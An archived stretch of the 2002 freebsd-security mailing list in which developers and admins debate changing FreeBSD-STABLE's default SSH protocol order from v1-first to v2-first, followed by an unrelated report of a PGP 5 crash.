-0500 (CDT) (envelope-from hawkeyd) Date: Sat, 6 Jul 2002 12:52:23 -0500 (CDT) Message-Id: <200207061752.g66HqNX00351@sheol.localdomain> Mime-Version: 1.0 X-Newsreader: knews 1.0b.1 Reply-To: hawkeyd@visi.com Organization: if (!FIFO) if (!LIFO) break; References: <20020706035731.N2631-100000_walter@ns.sol.net> In-Reply-To: <20020706035731.N2631-100000_walter@ns.sol.net> From: hawkeyd@visi.com (D J Hawkey Jr) Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE X-Original-Newsgroups: sol.lists.freebsd.security To: jason-fbsd-security@shalott.net, freebsd-security@freebsd.org Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In article <20020706035731.N2631-100000_walter@ns.sol.net>, jason-fbsd-security@shalott.net writes: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > >> > As a lot has changed with OpenSSH in FreeBSD, perhaps now is a good >> > time to make the 2,1 the default instead ? >> >> I'd like that. I think the only reason for the old default was not to >> surprise users who had the ssh1 RSA host key in their known_hosts but >> not the ssh2 DSA host key. >> >> What do people think about this? Keep 2,1 or revert to 1,2? > > There is a whole lot of infrastructure surrounding ssh v1 keys out there, > and it will all break if you change the default to v2. "2,1" means "v2" with fallback to "v1". This shouldn't break anything, unless something's already broken in a system's v2 configuration. > -Jason Dave -- Windows: "Where do you want to go today?" Linux: "Where do you want to go tomorrow?" FreeBSD: "Are you guys coming, or what?" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 11:28:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8F9B537B400 for ; Sat, 6 Jul 2002 11:28:16 -0700 (PDT) Received: from va.cs.wm.edu (va.cs.wm.edu [128.239.2.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id BAE2143E42 for ; Sat, 6 Jul 2002 11:28:15 -0700 (PDT) (envelope-from zvezdan@CS.WM.EDU) Received: from dali.cs.wm.edu (dali [128.239.26.26]) by va.cs.wm.edu (8.11.4/8.9.1) with ESMTP id g66IQHN13159 for ; Sat, 6 Jul 2002 14:26:17 -0400 (EDT) Received: (from zvezdan@localhost) by dali.cs.wm.edu (8.11.6/8.9.1) id g66IS9002684 for security@FreeBSD.ORG; Sat, 6 Jul 2002 14:28:09 -0400 Date: Sat, 6 Jul 2002 14:28:09 -0400 From: Zvezdan Petkovic To: security@FreeBSD.ORG Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] Message-ID: <20020706142809.A2652@dali.cs.wm.edu> Mail-Followup-To: security@FreeBSD.ORG References: <20020706035731.N2631-100000@walter> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020706035731.N2631-100000@walter>; from jason-fbsd-security@shalott.net on Sat, Jul 06, 2002 at 04:02:27AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, Jul 06, 2002 at 04:02:27AM -0700, Jason Stone wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > > > > As a lot has changed with OpenSSH in FreeBSD, perhaps now is a good > > > time to make the 2,1 the default instead ? > > > > I'd like that. I think the only reason for the old default was not to > > surprise users who had the ssh1 RSA host key in their known_hosts but > > not the ssh2 DSA host key. > > > > What do people think about this? Keep 2,1 or revert to 1,2? > > There is a whole lot of infrastructure surrounding ssh v1 keys out there, > and it will all break if you change the default to v2. > I usually keep silent but this really triggered me. What do you mean when you say it will _all_ break? I remember very well that the switching to v2 didn't involve too much. The default in OpenSSH source is Protocol 2,1. That doesn't exclude Protocol 1. It only means that the client will try v2 first, and if it doesn't succeed it will fall back to v1. Thus, if your server doesn't want to talk v2 the client won't be able to use it and will work as v1. For instance, an old Solaris server that's too slow to run v2 talks happily (v1 only) with 2,1 clients without any change. If you do not want your client to talk v2 at all, is it really that difficult to roll a loop over your network and echo " Protocol 1,2" >>/etc/ssh/ssh_config on your clients? > With the 5.0-RELEASE on the not-too-distant horizon, I really think it > best to not change default behaviour within a major release. Keep the > default as it is - don't break people. > Did you actually try this to claim so confidently that the switch will _break_ them so badly? My experience is not that bad. -- Zvezdan Petkovic http://www.cs.wm.edu/~zvezdan/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 12:40:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 02B3F37B400; Sat, 6 Jul 2002 12:40:42 -0700 (PDT) Received: from mail.tgd.net (mail.tgd.net [209.81.25.10]) by mx1.FreeBSD.org (Postfix) with ESMTP id A9B4A43E09; Sat, 6 Jul 2002 12:40:41 -0700 (PDT) (envelope-from sean@mail.tgd.net) Received: by mail.tgd.net (Postfix, from userid 1001) id 48F1A20F01; Sat, 6 Jul 2002 12:40:40 -0700 (PDT) Date: Sat, 6 Jul 2002 12:40:40 -0700 From: Sean Chittenden To: Dag-Erling Smorgrav Cc: Trevor Johnson , Mike Tancsa , Ruslan Ermilov , security@FreeBSD.ORG Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] Message-ID: <20020706124040.D43307@ninja1.internal> References: <20020705094314.C73784-100000@blues.jpj.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: ; from "des@ofug.org" on Fri, Jul 05, 2002 at = 04:11:01PM X-PGP-Key: 0x1EDDFAAD X-PGP-Fingerprint: C665 A17F 9A56 286C 5CFB 1DEA 9F4F 5CEF 1EDD FAAD X-Web-Homepage: http://sean.chittenden.org/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > Use of protocol version 1 makes an insertion attack possible, according to > > . > > That same page also explains that OpenSSH contains code to make such > attacks very difficult. > > > The vulnerability was > > published by CORE SDI in June of 1998. I would like to see protocol > > version 1 disabled by default, with a note in UPDATING about the change. > > No. I will not arbitrarily lock users out of their machines. How about making it just proto 2 in -CURRENT and use that as the version to phase out proto 1. With all of the other security goodies going into 5.0, it seems like 5.0 would be shooting itself in the foot to have SSH1 enabled with HMAC and some of the other ACL fun. Besides, 5.0 seems like a nice transition point to begin phasing out SSH1. -sc -- Sean Chittenden To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 16:28:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 193E037B400 for ; Sat, 6 Jul 2002 16:28:22 -0700 (PDT) Received: from mail.lambertfam.org (www.lambertfam.org [216.223.196.6]) by mx1.FreeBSD.org (Postfix) with ESMTP id 90D4E43E4A for ; Sat, 6 Jul 2002 16:28:21 -0700 (PDT) (envelope-from lambert@lambertfam.org) Received: from localhost.localdomain (localhost [127.0.0.1]) by localhost.inch.com (Postfix) with ESMTP id 524D8350EE for ; Sat, 6 Jul 2002 19:26:32 -0400 (EDT) Received: from laptop.lambertfam.org (unknown [10.1.0.2]) by mail.lambertfam.org (Postfix) with ESMTP id 69B28350DB for ; Sat, 6 Jul 2002 19:26:28 -0400 (EDT) Received: by laptop.lambertfam.org (Postfix, from userid 1000) id 7DCE428B16; Sat, 6 Jul 2002 19:28:07 -0400 (EDT) Date: Sat, 6 Jul 2002 19:28:07 -0400 From: Scott Lambert To: freebsd-security@freebsd.org Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE Message-ID: <20020706232807.GA76607@laptop.lambertfam.org> Mail-Followup-To: freebsd-security@freebsd.org References: <20020706035731.N2631-100000_walter@ns.sol.net> <200207061752.g66HqNX00351@sheol.localdomain> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200207061752.g66HqNX00351@sheol.localdomain> User-Agent: Mutt/1.3.99i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, Jul 06, 2002 at 12:52:23PM -0500, D J Hawkey Jr wrote: > In article <20020706035731.N2631-100000_walter@ns.sol.net>, > jason-fbsd-security@shalott.net writes: > >> > As a lot has changed with OpenSSH in FreeBSD, perhaps now is a good > >> > time to make the 2,1 the default instead ? > >> I'd like that. I think the only reason for the old default was not to > >> surprise users who had the ssh1 RSA host key in their known_hosts but > >> not the ssh2 DSA host key. > >> > >> What do people think about this? Keep 2,1 or revert to 1,2? > > > > There is a whole lot of infrastructure surrounding ssh v1 keys out there, > > and it will all break if you change the default to v2. > > "2,1" means "v2" with fallback to "v1". This shouldn't break anything, > unless something's already broken in a system's v2 configuration. Unless you only have an v1 authorized key. Then you have to go through and either change all your ssh invocations in your scripts to use the "-1" parameter or create v2 keys. It sucks when your automated scripts don't run because of a new default. I'll live with it for my 20 hosts. Others, with bigger networks, have legitimate issues here. -- Scott Lambert KC5MLE Unix SysAdmin lambert@lambertfam.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 16:34:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 57A1337B400 for ; Sat, 6 Jul 2002 16:34:54 -0700 (PDT) Received: from klingon.borderworlds.dk (borderworlds.dk [193.162.142.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id A766943E4A for ; Sat, 6 Jul 2002 16:34:53 -0700 (PDT) (envelope-from dev-null@borderworlds.dk) Received: from borg.borderworlds.dk (localhost [127.0.0.1]) by klingon.borderworlds.dk (Postfix on SuSE Linux 7.2 (i386)) with ESMTP id DA464288C8 for ; Sun, 7 Jul 2002 01:34:51 +0200 (CEST) Received: by borg.borderworlds.dk (Postfix, from userid 500) id 2B3263B8037; Sun, 7 Jul 2002 01:34:51 +0200 (CEST) To: freebsd-security@freebsd.org Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE References: <20020706035731.N2631-100000_walter@ns.sol.net> <200207061752.g66HqNX00351@sheol.localdomain> <20020706232807.GA76607@laptop.lambertfam.org> From: Christian Laursen Reply-To: freebsd-security@freebsd.org Date: 07 Jul 2002 01:34:50 +0200 In-Reply-To: <20020706232807.GA76607@laptop.lambertfam.org> Message-ID: Lines: 21 User-Agent: Gnus/5.09 (Gnus v5.9.0) Emacs/21.1 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Scott Lambert writes: > On Sat, Jul 06, 2002 at 12:52:23PM -0500, D J Hawkey Jr wrote: > > In article <20020706035731.N2631-100000_walter@ns.sol.net>, > > >> What do people think about this? Keep 2,1 or revert to 1,2? > > > > > > There is a whole lot of infrastructure surrounding ssh v1 keys out there, > > > and it will all break if you change the default to v2. > > > > "2,1" means "v2" with fallback to "v1". This shouldn't break anything, > > unless something's already broken in a system's v2 configuration. > > Unless you only have an v1 authorized key. Then you have to go through > and either change all your ssh invocations in your scripts to use the "-1" > parameter or create v2 keys. Or you can just specify "Protocol 1,2" in /etc/ssh/ssh_config. -- Best regards Christian Laursen To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 21:33:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A774E37B400 for ; Sat, 6 Jul 2002 21:33:08 -0700 (PDT) Received: from walter.dfmm.org (walter.dfmm.org [209.151.233.240]) by mx1.FreeBSD.org (Postfix) with ESMTP id 50B4143E42 for ; Sat, 6 Jul 2002 21:33:08 -0700 (PDT) (envelope-from jason@shalott.net) Received: (qmail 7516 invoked by uid 1000); 7 Jul 2002 04:33:02 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 7 Jul 2002 04:33:02 -0000 Date: Sat, 6 Jul 2002 21:33:02 -0700 (PDT) From: Jason Stone X-X-Sender: To: Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] In-Reply-To: <20020706142809.A2652@dali.cs.wm.edu> Message-ID: <20020706204840.C2631-100000@walter> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > > > What do people think about this? Keep 2,1 or revert to 1,2? > > > > There is a whole lot of infrastructure surrounding ssh v1 keys out there, > > and it will all break if you change the default to v2. > > > > I usually keep silent but this really triggered me. > What do you mean when you say it will _all_ break? Currently, people have scripts and cronjobs which use ssh v1 keys for regular maintainence, data collection, etc. Users have v1 keys widely deployed to all the machines they use, etc. This is what I mean by infrastructure. When the default changes to v2, then when connections are made, v2 will be negotiated and the v1 keys will be ignored. So when users upgrade from 4.6 to 4.7, run their agent and try to login to remote machines, their keys won't be used. When admins upgrade from 4.6 to 4.7 on their networks, the maintainance scripts and cronjobs will suddenly stop working. This is what I mean by break. Yes, it is possible to either generate new keys or edit the config files to get the old behaviour back. But users expect that if their systems wotk with the defaults in 4.x, they'll continue to work in 4.x. > > With the 5.0-RELEASE on the not-too-distant horizon, I really think it > > best to not change default behaviour within a major release. Keep the > > default as it is - don't break people. > > Did you actually try this to claim so confidently that the switch will > _break_ them so badly? My experience is not that bad. No, no, you missed the point entirely - I'm not talking about functionality or stability, I'm talking about release engineering. We're all anxious to get rid of protocol v1, but a major change like that shouldn't happen within a major version of the OS. But people _do_ expect radical changes from one major version of the OS to another, and since 5.0 will be released soon, we should be content that v2 will be the default soon without our changing 4.x. -Jason ----------------------------------------------------------------------- I worry about my child and the Internet all the time, even though she's too young to have logged on yet. Here's what I worry about. I worry that 10 or 15 years from now, she will come to me and say "Daddy, where were you when they took freedom of the press away from the Internet?" -- Mike Godwin -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: See https://private.idealab.com/public/jason/jason.gpg iD8DBQE9J8R+swXMWWtptckRArreAKCV30ZMxS2CyJpi4yB4N47rmTG3hQCgvCRN XruArVVYYB8LCuDEA7Hbogs= =Kena -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 21:56:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 401BB37B400 for ; Sat, 6 Jul 2002 21:56:13 -0700 (PDT) Received: from smtp016.mail.yahoo.com (smtp016.mail.yahoo.com [216.136.174.113]) by mx1.FreeBSD.org (Postfix) with SMTP id 012D743E52 for ; Sat, 6 Jul 2002 21:56:13 -0700 (PDT) (envelope-from anthonyrubin@yahoo.com) Received: from w184.z064001133.chi-il.dsl.cnc.net (HELO yahoo.com) (anthonyrubin@64.1.133.184 with plain) by smtp.mail.vip.sc5.yahoo.com with SMTP; 7 Jul 2002 04:56:12 -0000 Message-ID: <3D27C9EA.6090207@yahoo.com> Date: Sat, 06 Jul 2002 23:56:10 -0500 From: Anthony Rubin User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Jason Stone Cc: security@FreeBSD.ORG Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] References: <20020706204840.C2631-100000@walter> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Do people who depend on such things run mergemaster and blindly accept all changes? Does everyone throw every new -RELEASE into production without any testing? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 22: 5:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B746F37B401 for ; Sat, 6 Jul 2002 22:05:44 -0700 (PDT) Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34]) by mx1.FreeBSD.org (Postfix) with ESMTP id C0F6E43E72 for ; Sat, 6 Jul 2002 22:05:41 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from FreeBSD.org (12-234-90-219.client.attbi.com [12.234.90.219]) by mail-relay1.yahoo.com (Postfix) with ESMTP id F2C1E8B5DA; Sat, 6 Jul 2002 22:05:40 -0700 (PDT) Message-ID: <3D27CC1F.DBD85584@FreeBSD.org> Date: Sat, 06 Jul 2002 22:05:35 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.5-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Anthony Rubin Cc: Jason Stone , security@FreeBSD.ORG Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLEnow has OpenSSH 3.4p1] References: <20020706204840.C2631-100000@walter> <3D27C9EA.6090207@yahoo.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Anthony Rubin wrote: > > Do people who depend on such things run mergemaster and blindly accept > all changes? Does everyone throw every new -RELEASE into production > without any testing? You've missed the point. This would be an architectural change. We do those between branches, not towards the end of life of a -stable branch. Those who want protocol 2 to be the default have a simple config change to make... users expecting the RELENG_4 branch to actually be -stable shouldn't have their expectations so violently disturbed. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 22:11: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 71F6D37B400 for ; Sat, 6 Jul 2002 22:10:59 -0700 (PDT) Received: from smtp018.mail.yahoo.com (smtp018.mail.yahoo.com [216.136.174.115]) by mx1.FreeBSD.org (Postfix) with SMTP id CC1BF43E3B for ; Sat, 6 Jul 2002 22:10:58 -0700 (PDT) (envelope-from anthonyrubin@yahoo.com) Received: from w184.z064001133.chi-il.dsl.cnc.net (HELO yahoo.com) (anthonyrubin@64.1.133.184 with plain) by smtp.mail.vip.sc5.yahoo.com with SMTP; 7 Jul 2002 05:10:58 -0000 Message-ID: <3D27CD60.8080906@yahoo.com> Date: Sun, 07 Jul 2002 00:10:56 -0500 From: Anthony Rubin User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Doug Barton Cc: Jason Stone , security@FreeBSD.ORG Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLEnow has OpenSSH 3.4p1] References: <20020706204840.C2631-100000@walter> <3D27C9EA.6090207@yahoo.com> <3D27CC1F.DBD85584@FreeBSD.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In order for this change to affect a user they would have to run mergemaster, see the change, and tell mergemaster to go ahead and merge or overwrite their config file. Do people let mergemaster overwrite /etc/groups and such? Doug Barton wrote: > Anthony Rubin wrote: > >>Do people who depend on such things run mergemaster and blindly accept >>all changes? Does everyone throw every new -RELEASE into production >>without any testing? > > > You've missed the point. This would be an architectural change. We do > those between branches, not towards the end of life of a -stable branch. > > Those who want protocol 2 to be the default have a simple config change > to make... users expecting the RELENG_4 branch to actually be -stable > shouldn't have their expectations so violently disturbed. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 22:43: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ED0E537B400 for ; Sat, 6 Jul 2002 22:43:01 -0700 (PDT) Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34]) by mx1.FreeBSD.org (Postfix) with ESMTP id A77FD43E3B for ; Sat, 6 Jul 2002 22:43:01 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from FreeBSD.org (12-234-90-219.client.attbi.com [12.234.90.219]) by mail-relay1.yahoo.com (Postfix) with ESMTP id B9B048B5C5; Sat, 6 Jul 2002 22:42:29 -0700 (PDT) Message-ID: <3D27D4C5.5BB6DC25@FreeBSD.org> Date: Sat, 06 Jul 2002 22:42:29 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.5-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Anthony Rubin Cc: Jason Stone , security@FreeBSD.org Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLEnowhas OpenSSH 3.4p1] References: <20020706204840.C2631-100000@walter> <3D27C9EA.6090207@yahoo.com> <3D27CC1F.DBD85584@FreeBSD.org> <3D27CD60.8080906@yahoo.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Anthony Rubin wrote: > > In order for this change to affect a user they would have to run > mergemaster, see the change, and tell mergemaster to go ahead and merge > or overwrite their config file. Or, install a new box after wiping the old layout, or any number of scenarios. The point remains, we don't do changes like this within a -stable branch. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jul 6 22:54:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F131337B400 for ; Sat, 6 Jul 2002 22:54:12 -0700 (PDT) Received: from rip.psg.com (rip.psg.com [147.28.0.39]) by mx1.FreeBSD.org (Postfix) with ESMTP id B5B4E43E58 for ; Sat, 6 Jul 2002 22:54:12 -0700 (PDT) (envelope-from randy@psg.com) Received: from localhost ([127.0.0.1] helo=rip.psg.com.psg.com) by rip.psg.com with esmtp (Exim 4.05) id 17R4zs-000LZb-00 for freebsd-security@freebsd.org; Sat, 06 Jul 2002 22:54:12 -0700 From: Randy Bush MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: freebsd-security@freebsd.org Subject: signal 8 (fp execption) in pgp 5 Message-Id: Date: Sat, 06 Jul 2002 22:54:12 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org yesterday's -stable and ports tree, rebuilt twice. % pgpk -l randy Type Bits KeyID Created Expires Algorithm Use sec+ 1024 0xB1331439 1994-04-04 ---------- RSA Sign & Encrypt uid Randy Bush 1 matching key found Received signal 8. anyone else see this or have a clue? randy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message